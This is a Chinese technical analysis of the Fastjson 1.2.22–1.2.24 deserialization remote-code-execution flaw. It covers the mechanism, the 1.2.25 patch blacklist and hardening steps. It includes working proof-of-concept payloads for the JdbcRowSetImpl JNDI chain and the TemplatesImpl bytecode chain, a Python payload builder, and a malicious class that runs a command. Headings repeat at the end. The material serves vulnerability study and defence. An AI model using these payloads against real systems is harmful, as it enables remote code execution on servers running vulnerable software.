Fastjson 1.2.22-1.2.24反序列化漏洞深度分析<\/h1>

一、Fastjson简介<\/h2>

Fastjson是阿里巴巴开发的高性能JSON库，用于Java对象与JSON数据之间的转换。主要提供两个核心接口：<\/p>

JSON.toJSONString<\/code>：实现序列化（Java对象→JSON）<\/li>

JSON.parseObject<\/code>\/JSON.parse<\/code>：实现反序列化（JSON→Java对象）<\/li>
<\/ul>
二、Fastjson序列化与反序列化机制<\/h2>
1. 序列化示例<\/h3>
public<\/span> class<\/span> Student<\/span> {<\/span>
<\/span><\/span>    private<\/span> String name;<\/span>
<\/span><\/span>    private<\/span> int<\/span> age;<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 构造函数和getter\/setter方法
<\/span><\/span><\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化操作
<\/span><\/span><\/span><\/span>String jsonstring =<\/span> JSON.<\/span>toJSONString<\/span>(<\/span>student,<\/span> SerializerFeature.<\/span>WriteClassName<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>关键点：<\/p>

SerializerFeature.WriteClassName<\/code>：序列化时添加@type<\/code>字段，记录类名<\/li>
无此参数时生成普通JSON对象，有则生成带类型信息的JSON<\/li>
<\/ul>
2. 反序列化方法<\/h3>
Fastjson提供两种反序列化方式：<\/p>

parse<\/code>：基础反序列化<\/li>
parseObject<\/code>：基于parse<\/code>，额外调用toJSON<\/code>处理对象<\/li>
<\/ol>
\/\/ 需要@type指定类名才能正确反序列化
<\/span><\/span><\/span><\/span>String jsonstring =<\/span> "{\"@type\":\"Student\",\"age\":80,\"name\":\"ghtwf01\"}"<\/span>;<\/span>
<\/span><\/span>System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>JSON.<\/span>parse<\/span>(<\/span>jsonstring));<\/span>  \/\/ 只触发set方法
<\/span><\/span><\/span><\/span>System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>JSON.<\/span>parseObject<\/span>(<\/span>jsonstring));<\/span>  \/\/ 触发set和get方法
<\/span><\/span><\/span><\/code><\/pre>三、漏洞原理<\/h2>
根本原因<\/strong>：Fastjson的autoType<\/code>特性允许指定任意类进行反序列化，当目标类的getter\/setter方法中存在危险操作时，可导致任意代码执行。<\/p>
漏洞触发条件<\/h3>

反序列化的类存在危险的getter\/setter方法<\/li>
使用@type<\/code>指定恶意类<\/li>
Fastjson版本在1.2.22-1.2.24之间<\/li>
<\/ol>
四、漏洞利用链分析<\/h2>
1. JdbcRowSetImpl利用链（JNDI注入）<\/h3>
利用原理<\/strong>：通过JNDI注入实现RCE<\/p>
POC<\/strong>：<\/p>
{
<\/span><\/span>    "@type"<\/span>:"com.sun.rowset.JdbcRowSetImpl"<\/span>,
<\/span><\/span>    "dataSourceName"<\/span>:"rmi:\/\/127.0.0.1:1099\/Exploit"<\/span>,
<\/span><\/span>    "autoCommit"<\/span>:true<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>攻击流程<\/strong>：<\/p>

攻击者搭建RMI\/LDAP服务<\/li>
服务端提供恶意类（如执行计算器的类）<\/li>
受害者解析恶意JSON时触发JNDI查询<\/li>
加载远程恶意类执行代码<\/li>
<\/ol>
关键调用栈<\/strong>：<\/p>
connect:643, JdbcRowSetImpl
setAutoCommit:4081, JdbcRowSetImpl
invoke0:-1, NativeMethodAccessorImpl
...
parse:137, JSON
<\/code><\/pre>
2. TemplatesImpl利用链（字节码加载）<\/h3>
利用原理<\/strong>：通过_bytecodes<\/code>字段传入恶意类字节码，触发getOutputProperties<\/code>时实例化执行<\/p>
恶意类示例<\/strong>：<\/p>
public<\/span> class<\/span> TEMPOC<\/span> extends<\/span> AbstractTranslet {<\/span>
<\/span><\/span>    public<\/span> TEMPOC<\/span>()<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>        Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"open -a Calculator"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    \/\/ 必须实现的两个transform方法
<\/span><\/span><\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>POC构造<\/strong>：<\/p>
import<\/span> base64
<\/span><\/span>fin =<\/span> open(r<\/span>"TEMPOC.class"<\/span>, "rb"<\/span>)
<\/span><\/span>byte =<\/span> fin.<\/span>read()
<\/span><\/span>fout =<\/span> base64.<\/span>b64encode(byte).<\/span>decode("utf-8"<\/span>)
<\/span><\/span>poc =<\/span> '{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["<\/span>%s<\/span>"],"_name":"a.b","_tfactory":<\/span>{}<\/span>,"_outputProperties":<\/span>{}<\/span>}'<\/span> %<\/span> fout
<\/span><\/span><\/code><\/pre>关键点<\/strong>：<\/p>

必须继承AbstractTranslet<\/code>类<\/li>
_bytecodes<\/code>需Base64编码<\/li>
必须设置_tfactory<\/code>为{}<\/code><\/li>
通过_outputProperties<\/code>触发<\/li>
<\/ol>
调用栈<\/strong>：<\/p>
<init>:13, TEMPOC
newInstance:423, Constructor
getTransletInstance:455, TemplatesImpl
newTransformer:486, TemplatesImpl
getOutputProperties:507, TemplatesImpl
...
parseObject:197, JSON
<\/code><\/pre>
五、技术细节解析<\/h2>
1. Fastjson反序列化流程<\/h3>

创建DefaultJSONParser<\/code>解析JSON字符串<\/li>
检测@type<\/code>指定的类名<\/li>
通过TypeUtils.loadClass<\/code>加载类：

先检查mappings缓存<\/li>
使用ClassLoader动态加载<\/li>
<\/ul>
<\/li>
创建ObjectDeserializer<\/code><\/li>
调用deserialze<\/code>方法处理各字段<\/li>
通过反射调用setter\/getter方法<\/li>
<\/ol>
2. 关键问题解答<\/h3>
为什么必须继承AbstractTranslet？<\/strong><\/p>

defineTransletClasses<\/code>方法会检查父类名，非ABSTRACT_TRANSLET<\/code>会抛出异常<\/li>
<\/ul>
为什么_bytecodes需要Base64编码？<\/strong><\/p>

Fastjson在解析时会自动对_bytecodes<\/code>内容进行Base64解码<\/li>
<\/ul>
为什么需要设置_tfactory为{}？<\/strong><\/p>

避免defineTransletClasses<\/code>方法因_tfactory<\/code>为null而报错<\/li>
<\/ul>
六、补丁分析<\/h2>
1.2.25版本修复措施：<\/p>

用checkAutoType()<\/code>替换TypeUtils.loadClass<\/code><\/li>
采用黑白名单机制：

白名单优先检查<\/li>
不通过时检查黑名单<\/li>
<\/ul>
<\/li>
黑名单包含常见危险类：
bsh,<\/span> com.<\/span>mchange<\/span>,<\/span> com.<\/span>sun<\/span>.,<\/span> java.<\/span>net<\/span>.<\/span>Socket<\/span>,<\/span> 
<\/span><\/span>java.<\/span>rmi<\/span>,<\/span> javax.<\/span>xml<\/span>,<\/span> org.<\/span>apache<\/span>.<\/span>bcel<\/span>,<\/span> 
<\/span><\/span>org.<\/span>apache<\/span>.<\/span>commons<\/span>.<\/span>beanutils<\/span>,<\/span> org.<\/span>apache<\/span>.<\/span>commons<\/span>.<\/span>collections<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
七、防护建议<\/h2>

升级到最新安全版本（≥1.2.83）<\/li>
关闭autoType<\/code>功能：
ParserConfig.<\/span>getGlobalInstance<\/span>().<\/span>setAutoTypeSupport<\/span>(<\/span>false<\/span>);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
使用安全模式：
ParserConfig.<\/span>getGlobalInstance<\/span>().<\/span>setSafeMode<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
严格限制反序列化的类范围<\/li>
<\/ol>
八、参考资源<\/h2>

Fastjson官方GitHub：https:\/\/github.com\/alibaba\/fastjson<\/li>
漏洞分析文章：

http:\/\/xxlegend.com\/2017\/05\/03\/title-fastjson远程反序列化poc的构造和分析\/<\/li>
https:\/\/www.mi1k7ea.com\/2019\/11\/07\/Fastjson系列二——1-2-22-1-2-24反序列化漏洞\/<\/li>
<\/ul>
<\/li>
<\/ol>

Fastjson 1.2.22-1.2.24反序列化漏洞深度分析<\/h1>

二、Fastjson序列化与反序列化机制<\/h2>

三、漏洞原理<\/h2> 根本原因<\/strong>：Fastjson的autoType<\/code>特性允许指定任意类进行反序列化，当目标类的getter\/setter方法中存在危险操作时，可导致任意代码执行。<\/p>

四、漏洞利用链分析<\/h2>

五、技术细节解析<\/h2>

三、漏洞原理<\/h2>
根本原因<\/strong>：Fastjson的`autoType<\/code>特性允许指定任意类进行反序列化，当目标类的getter\/setter方法中存在危险操作时，可导致任意代码执行。<\/p>`